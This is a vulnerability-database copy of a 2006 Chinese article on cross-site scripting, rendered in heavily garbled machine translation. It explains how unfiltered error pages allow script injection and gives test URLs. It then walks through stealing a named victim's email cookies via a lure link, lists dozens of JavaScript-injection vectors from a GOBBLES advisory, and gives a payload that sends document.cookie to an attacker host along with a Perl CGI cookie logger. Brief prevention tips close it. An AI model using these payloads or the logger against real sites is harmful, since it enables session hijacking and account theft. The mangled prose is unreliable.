Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
myhack58佚名MYHACK58:62200610331
HistoryJul 11, 2006 - 12:00 a.m.

Cross-site scripting-vulnerability warning-the black bar safety net

2006-07-1100:00:00
佚名
www.myhack58.com
11
JSON

What is cross-site scripting(CSS/XSS)?

We said the cross-site scripting refers to a remote WEB page’s html code is inserted with the malicious purpose of the data, the user that the
The page is trustworthy, but when the browser downloads the page, the embedded script will be interpreted,
Sometimes cross-site scripting is referred to as"XSS", this is because"CSS"is generally referred to as the hierarchical style sheet, it’s easy to make people confused,
If
You listen to someone mention CSS orXSSsecurity vulnerability typically refers to cross-site scripting.

XSSand script injection is the difference?

The original author is and he’s a friend(b0iler)after discussion, realized that is not any available script to insert to achieve the attack
The vulnerabilities are referred toXSS, there is another attack mode:“Script Injection”,their difference in the following two points:

  1. (Script Injection)script insertion attacks will put we insert the script to save in is to modify the remote WEB page,such as
    :sql injection,XPath injection.
  2. Cross-site scripting is temporary, after the execution of the disappeared
    What types of scripts can be inserted into the remote page?

The mainstream of the script includes the following:
HTML
JavaScript (discussed herein)
VBScript
ActiveX
Flash

What causes a site existsXSSthe security vulnerability?

Many of the cgi/php script executes, if it is found that the customer submits the requested page does not exist or other type of error,
An error message will be printed to a html file, and the error page sent to the visitor.
For example: 4 0 4 - yourfile.html Not Found!

We generally such information does not note, but now want to study CSS vulnerability causes, we still take a second look.
Example: www.somesite.tld/cgi-bin/program.cgi?page=downloads.html
The URL pointing to the connection is valid, but if we put back the downloads. html replaced brainrawt_owns_
me.html
That one contains the 4 0 4 - brainrawt_owns_me.html Not Found! The information page will give feedback to the visitor’s browsing
.
Consider how it is to put our input is written to the html file?

OK, now we checkXSSthe vulnerability of the time!

Note: the following is just one example, the page existsXSSvulnerabilities, we can insert one writes javascript code to the page
. Of course in many ways
www.somesite.tld/cgi-bin/program.cgi?page=<script>alert(XSS_Vuln_Testing)</sc
ript>
When we submitted the URL, in our browser POPs up a message box"XSS_Vuln_Testing"?
This example is just oneXSSvulnerabilities in the simple demo, and no actual sense, but enough to illustrate the problem.

Below we analyze what caused the operating results of the reason, program. cgi on our input has not been effective filtration process
that
It is written directly 4 0 4 error page, the results created a page, as follows:
<html>

<b>4 0 4</b> - <script>alert(XSS_Vuln_Testing)</script> Not Found!

</html>

One of the javascript script through the browser, interpreted, and then it appeared you can see the results.

How to useXSSto finish*ing with?

As previously mentioned, if the user submitted the request cannot be met, then the server side script will take the input information written to
A
html file, when the server-side program to write the html file of the data is not effectively filtered, malicious scripts can be inserted
To
This html file. Other users to browse the connection when the script by the client browser interpreted.

Examples:

Suppose you found myemailserver. tld has a CSS vulnerability, you want to get one email account, such as our
The target is b00b this person.
www.myemailserver.tld/cgi-bin/news.cgi?article=59035
The presence of the above CSS vulnerability of the connection to modify it:
www.myemailserver.tld/cgi-bin/news.cgi?article=hax0red
This will create an error page, we get the following information:
Invalid Input! [article=hax0red]

When you insert the following javascript code, on your screen will pop-up contains a test of the message box.
www.myemailserver.tld/cgi-bin/news.cgi?article=<script>alert(test)<
/script>
<script>and did not print to the screen, it is hidden behind the execution, since the server end of the program and not to
<script>alert(test)</script>be an effective filter, so the page is sent back to the browser and execute the script
the.

Below we look at how to exploit the vulnerability to invasion b00b comrade mailbox, first you must know b00b email address,
And you know the cookies of the role. Then you can tell b00b a malicious connection, Hey, of course
It was intended from the b00b machine cookie information to obtain your own desired stuff.
Find a way to get b00b access myemailserver. tld site published articles, for example:”dear b00b,take a look at this beauty
Female
How?”

Then when the poor b00b access www.myemailserver.tld/cgi-bin/news.cgi?article=<script>steal
And save the cookie script
</script>
Connection, what’s happening? cookies have, you know what to do!

If you are not currently in such a situation, you can copy the email server of the landing page, linked to other systems,
And then guide the user to log in to your malicious system page
Such user information you can be recorded, then the recorded information is sent back to the real email server page,
Those morons do not realize what is actually happening.

Put a javascript script into a WEB page different methods:

<snip>
Copy from: GOBBLES SECURITY ADVISORY #3 3
Here is a cut-n-paste collection of typical JavaScript-injection *s
you may derive some glee from playing with.

<a href=“javascript#[code]”>
<div >
<img src=“/javascript: [code]”>
<img dynsrc=“/javascript: [code]”> [IE]
<input type=“image” dynsrc=“/javascript: [code]”> [IE]
<bgsound src=“/javascript: [code]”> [IE]
&<script>[code]</script>
&{[code]}; [N4]
<img src=“/&”;{[code]}; a> [N4]
<link rel=“stylesheet” href=“/javascript: [code]”>
<iframe src=“/vbscript: the[code]”> [IE]
<img src=“mocha:[code]”> [N4]
<img src=“/livescript:[code]”> [N4]
<a href=“about:<script>[code]</script>”>
<meta http-equiv=“refresh” content=“0;url=javascript: [code]”>
<body >
<div style=“background-image: url(/javascript: [code]);”>
<div style=“behaviour: url([link to code]);”> [IE]
<div style=“binding: url([link to code]);”> [Mozilla]
<div style=“width: expression([code]);”> [IE]
<style type=“text/javascript”>[code]</style> [N4]
<object classid=“clsid:…” codebase=“javascript: [code]”> [IE]
<style><!–& lt;/style><script>[code]//–></script>
<! [CDATA[<!–]]& gt;<script>[code]//–></script>
<!-- – –><script>[code]</script><!-- – –>
<script>[code]</script>
<img src=“/blah”>
<img src=“blah>” >
<xml src=“/javascript: [code]”>
<xml id=“X”><a><b><script>[code]</script>;</b></a></xml>
<div datafld=“b” dataformatas=“html” datasrc=“#X”></div>
[\xC0][\xBC]script>[code][\xC0][\xBC]/script> [UTF-8; IE, Opera]

-— Copied from GOBBLES SECURITY ADVISORY #3 3----
</snip>

A real get the cookie and do recording of examples:

Note: to make it work, your browser must allow acceptance of the http://website. tld site to send cookies
When I test the following information, using the
javascript to create the visitor’s cookies, javascript script placed in the index. html file.
OK, the following assumes that the http://website. the tld existsXSSto attack the security risks, gaps in the connection are:
http://website.tld/program.cgi?input=&lt;evil javascript>
We create such a connection:
http://website.tld/program.cgi?input=&lt;script&gt;document. location=http://yoursite
. the tld
/cgi-bin/evil_cookie_logger. cgi?+ documents. cookie</script>
Then let save this site cookies user access to this connection:

This is our CGI script, it is the role of the user cookie do the record:

---------evil_cookie_logger. cgi-----------

#!/ usr/bin/perl

evil_cookie_logger. cgi

remote cookie logging CGI coded by BrainRawt

NOTE: coded as a proof of concept script when testing for

cross-site scripting vulnerabilities.

$borrowed_info = $ENV{QUERY_STRING};
$borrowed_info =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack(“C”, hex($1))/eg;

open(EVIL_COOKIE_LOG, “>>evil_cookie_log”) or print “Content-type:
text/html\n\n something went wrong\n”;
print EVIL_COOKIE_LOG “$borrowed_info\n”;
print “Content-type: text/html\n\n”;
close(EVIL_COOKIE_LOG);

------------------------------------------

The script by $ENV{QUERY_STRING}to get the cookie to print to$borrowed_info variables,
By open(EVIL_COOKIE_LOG, “>>evil_cookie_log”), the cookie information saved to the evil_cookie_lo
g files.

Note: the above javascript script, it may in some browser or the site can not be performed,
This is only my own site to do the test.

How to preventingXSSattack?

  1. In your WEB browser disable the javascript script
    2…developers have to carefully audit the code to submit the input data is a valid check, such as"<“and”>".

You can put"<“,”>“is converted to<,>
Note: Due toXSSvulnerabilities can be exploited the diversity of the programmers themselves to understand the specific needs of the filter of the characters,
This is mainly dependent on the development program of the role, recommended to filter out all meta-characters, including”=" in.

For victims that do not access the contain<script>characters of the connection, some of the official URL does not include any script elements.

JSON